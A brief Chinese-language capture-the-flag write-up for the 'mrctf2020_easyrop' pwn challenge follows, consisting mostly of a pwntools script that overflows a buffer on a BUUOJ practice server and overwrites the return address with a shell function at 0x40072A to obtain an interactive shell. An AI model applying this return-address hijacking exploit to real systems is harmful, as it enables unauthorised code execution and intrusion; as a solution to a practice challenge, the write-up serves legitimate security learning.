mrctf2020_easyrop
查看保护
简单题
用hehe和byby这两个函数配合起来rop就行
from pwn import *
from time import sleep
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
debug = 1
if debug:
r = remote('node4.buuoj.cn', 26201)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
shell = 0x40072A
r.sendline('2')
p1 = b'a' * 0x300
sleep(1)
r.send(p1)
r.sendline('7')
sleep(1)
p2 = b'a' * 0x12 + p64(shell)
r.send(p2)
r.interactive()